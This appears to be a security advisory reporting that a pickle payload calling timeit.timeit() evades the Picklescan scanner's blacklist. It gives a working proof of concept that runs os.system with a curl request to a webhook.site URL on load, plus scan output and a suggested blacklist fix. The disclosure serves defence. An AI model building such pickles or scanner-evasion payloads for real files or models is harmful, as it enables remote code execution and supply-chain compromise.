Summary
A malicious pickle file can abuse timeit.timeit(), a built-in Python library function, to execute arbitrary OS commands when loaded, while evading Picklescan's detection.
Details
Pickle's deserialization process is known to allow execution of arbitrary callables via the __reduce__ method. While Picklescan is meant to detect such exploits, this attack evades detection by invoking a standard-library function, timeit.timeit(), instead of a well-known dangerous global. Because the timeit module is not on the unsafe globals blacklist, the payload does not raise a red flag in the security scan.
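For contrast, the kind of payload Picklescan is designed to catch references a blacklisted global such as os.system directly in __reduce__. The following sketch is illustrative only (it is not the payload reported here) and is the pattern the scanner is expected to flag:

import os
import pickle

class DetectedPayload(object):
    def __reduce__(self):
        # os.system is a blacklisted global, so a scan of this pickle reports it as dangerous.
        return os.system, ('echo this payload would be flagged',)

with open('detected.pickle', 'wb') as f:
    pickle.dump(DetectedPayload(), f)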
The attack proceeds in the following steps:
First, the attacker crafts the payload by returning timeit.timeit() from the timeit library in the __reduce__ method.
Inside the arguments passed to timeit.timeit(), the attacker imports a dangerous library such as os and calls os.system() to run OS commands, for example a curl command. The attacker then sends this malicious pickle file to the victim.
Finally, the victim checks the pickle file with the Picklescan library, which does not detect any dangerous functions, and decides to pickle.load() the malicious file, which leads to remote code execution.
PoC
1. The attacker crafts a malicious pickle file using the built-in Python library function timeit.timeit():
import pickle
import timeit

class Payload(object):
    def __reduce__(self):
        # timeit.timeit() runs the "setup" string once, executing the OS command.
        return timeit.timeit, ('', 'import os; os.system("curl https://webhook.site/95f3e1c3-ee37-4a5a-8544-ab4ce93475f6")')

def create_payload():
    with open('payload.pickle', 'wb') as f:
        pickle.dump(Payload(), f)

create_payload()
The attacker then sends this pickle file to the victim's computer, expecting the victim to load it with pickle.load().
2. The victim uses the picklescan library to check whether the received pickle file is malicious:
picklescan -p payload.pickle
----------- SCAN SUMMARY -----------
Scanned files: 1
Infected files: 0
Dangerous globals: 0
3. Believing that the pickle file is safe based on the picklescan result, the victim loads it, which triggers timeit.timeit() and executes the OS command (in this example, a curl request):
import pickle

def load_payload():
    # Loading the pickle invokes timeit.timeit() via __reduce__, running the OS command.
    with open('payload.pickle', 'rb') as f:
        pickle.load(f)

load_payload()
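As an additional check not in the original report, the evasion can be confirmed by disassembling the file with Python's standard-library pickletools module: the opcodes import timeit.timeit rather than os.system, which is exactly why a blacklist that omits timeit misses the payload.

import pickletools

# Print the pickle opcodes; the imported global is timeit.timeit, not os.system.
with open('payload.pickle', 'rb') as f:
    pickletools.dis(f)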
Impact
Severity: High
Who is impacted? Any organization or individual relying on picklescan to detect malicious pickle files inside PyTorch models.
What is the impact? Attackers can embed malicious code in pickle files that remains undetected by the scanner but executes when the pickle file is loaded.
Supply Chain Attack: Attackers can distribute infected pickle files across ML models, APIs, or saved Python objects.
Recommended Solution
I suggest adding the timeit module to the unsafe globals blacklist.
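A rough sketch of what such an entry could look like, assuming the blacklist is a mapping from module names to disallowed attributes (the name _unsafe_globals and the exact structure are my assumptions, not taken from picklescan's source):

# Hypothetical sketch only: the real blacklist lives inside picklescan and may
# use a different name or structure.
_unsafe_globals = {
    # ... existing entries such as "os", "subprocess", and "builtins" ...
    "timeit": "*",  # treat any timeit attribute, including timeit.timeit, as unsafe
}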